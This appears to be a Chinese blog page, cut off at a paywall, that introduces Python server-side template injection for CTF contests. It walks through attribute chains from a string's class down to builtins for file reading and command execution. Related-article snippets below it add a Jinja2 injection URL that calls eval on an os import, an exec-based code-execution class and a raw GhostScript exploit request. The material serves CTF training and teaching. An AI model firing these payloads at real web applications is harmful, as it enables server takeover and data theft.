php沙盒绕过ctf,浅析SSTI(python沙盒绕过)

最新推荐文章于 2025-04-18 23:12:42 发布
最新推荐文章于 2025-04-18 23:12:42 发布
阅读量1k 收藏 1
点赞数
文章标签: php沙盒绕过ctf
本文介绍了服务端模板注入(SSTI)的概念和攻击流程,重点讨论了如何在CTF比赛中绕过Python沙盒进行文件读取和命令执行。通过分析函数和内置模块,展示了多种读取文件和执行命令的方法,同时探讨了常见的绕过策略,包括中括号绕过、过滤引号和双下划线的应对,以及利用base64编码和字符串拼接来规避关键字过滤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下

0x01 简介

SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的

0x02 攻击流程

攻击流程,以文件读取为例子

函数解析

__class__ 返回调用的参数类型

__bases__ 返回类型列表

__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组

__subclasses__() 返回object的子类

__globals__ 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

获取基本类

''.__class__.__mro__[zxsq-anti-bbcode-2]

{}.__class__.__bases__[zxsq-anti-bbcode-0]

().__class__.__bases__[zxsq-anti-bbcode-0]

[zxsq-anti-bbcode-].__class__.__bases__[0]

request.__class__.__mro__[zxsq-anti-bbcode-8] //针对jinjia2/flask为[zxsq-anti-bbcode-9]适用

获取基本类后,继续向下获取基本类(object)的子类

object.__subclasses__()

找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的)

>>> ''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-99].__init__

<slot wrapper '__init__' of 'object' objects>

>>> ''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-59].__init__

<unbound method WarningMessage.__init__>

查看其引用__builtins__

builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以这里直接调用引用的模块

''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-59].__init__.__globals__[zxsq-anti-bbcode-'__builtins__']

这里会返回dict类型,寻找keys中可用函数,直接调用即可,使用keys中的file以实现读取文件的功能

''.__class__.__

最低0.47元/天 解锁文章
SSTI注入绕过-Jinjia2模板
fatmoForE
11-29 721
题目选自NCTF2020的Master 源码如下: from jinja2 import Template from flask import Flask,request app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') blacklist = ['%', '-', ':', '+', 'class', 'base', 'mro', '_', 'con
SSTI模板注入及绕过姿势(基于Python-Jinja2)
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
py-SSTI注入模板利用与绕过
最新发布
2301_81476211的博客
04-18 2124
ssti基础篇 常见注入模板 与 常见绕过
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1250
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI绕过
qq_64201116的博客
07-04 3006
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
php绕过,GhostScript 绕过(命令执行)漏洞(CVE-2018-19475)
weixin_30317869的博客
03-21 303
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
CTFPython考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4170
ctf题型分类: 1.CTFPython—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
一天一道ctf 第38天(报错模板注入 python逃逸 pin码生成)
scrawman的博客
07-20 787
[GYCTF2020]FlaskApp 先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤 随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warni
WEB攻防-python考点&CTF与CMS-SSTI模板注入&PYC反编译
2301_78384345的博客
10-10 381
知识点:1、PYC(python编译后的文件)文件反编译;3、SSTI模板注入利用分析;
转:LNMP虚拟主机PHP绕过/命令执行(php exec命令被禁之后)
weixin_30727835的博客
04-25 137
LNMP虚拟主机PHP绕过/命令执行 lnmp更新1.2版本,很多东西都升级了,很棒。不过还是发现一个BUG。 LNMP是一款linux下nginx、php、mysql一键安装包。 下载:http://soft.vpser.net/lnmp/lnmp1.2.tar.gz 执行一个命令即可简单安装。 漏洞详情 LNMP是这样配置的: disable_functio...
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 4197
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
SSTI模块注入】SSTI+Flask+Python(下):绕过过滤
07-25 3252
SSTI绕过过滤
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 6917
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
CTF ssti注入 (二)绕过
2301_81040377的博客
07-25 1064
这两者差不多。
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2103
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 2029
SSTI总结:流程和绕过
CTF - Python 绕过与任意命令执行技巧
miracle的专栏
09-10 1689
您可以修改某些类方法(通过覆盖现有类方法或创建新类),以使它们在被触发时执行任意代码,而无需直接调用它们。# 这个类有 3 种不同的方式在不直接调用任何函数的情况下触发 RCEclass RCE:__iadd__ = exec # 在对象创建时触发__isub__ = exec # 在对象创建时触发__getitem__ = exec # 用 obj[]触发__add__ = exec # 用 obj + 触发# 这些行直接滥用前面的类来获得 RCE。
SSTI模板注入-中括号、args、单双引号被过滤绕过ctfshow web入门365)
你们de4月天的博客
03-28 2162
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
php 箱逃逸,浅析Python SSTI/逃逸
06-01
好的,我可以回答你的问题。 首先,PHP箱逃逸是指攻击者通过某些手段,成功绕过PHP的安全限制,执行恶意代码,达到控制服务器的目的。常见的攻击手段包括但不限于:文件包含漏洞、命令注入、反序列化漏洞等。攻击者利用这些漏洞,成功绕过PHP的安全限制,从而达到控制服务器的目的,比如读取、修改、删除敏感文件,执行任意代码等。 其次,Python SSTI(Server-Side Template Injection)是指攻击者通过某些手段,成功绕过Python模板引擎的安全限制,执行恶意代码,达到控制服务器的目的。常见的攻击手段包括但不限于:模板注入、变量覆盖、函数调用等。攻击者利用这些漏洞,成功绕过Python模板引擎的安全限制,从而达到控制服务器的目的,比如读取、修改、删除敏感文件,执行任意代码等。 总的来说,PHP箱逃逸和Python SSTI都是非常危险的安全漏洞,需要及时修复。建议在开发过程中,注意代码的安全性,加强输入和输出的过滤,避免注入攻击等常见漏洞。同时,及时更新软件和框架版本,以及安装防火墙和安全插件等措施,提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值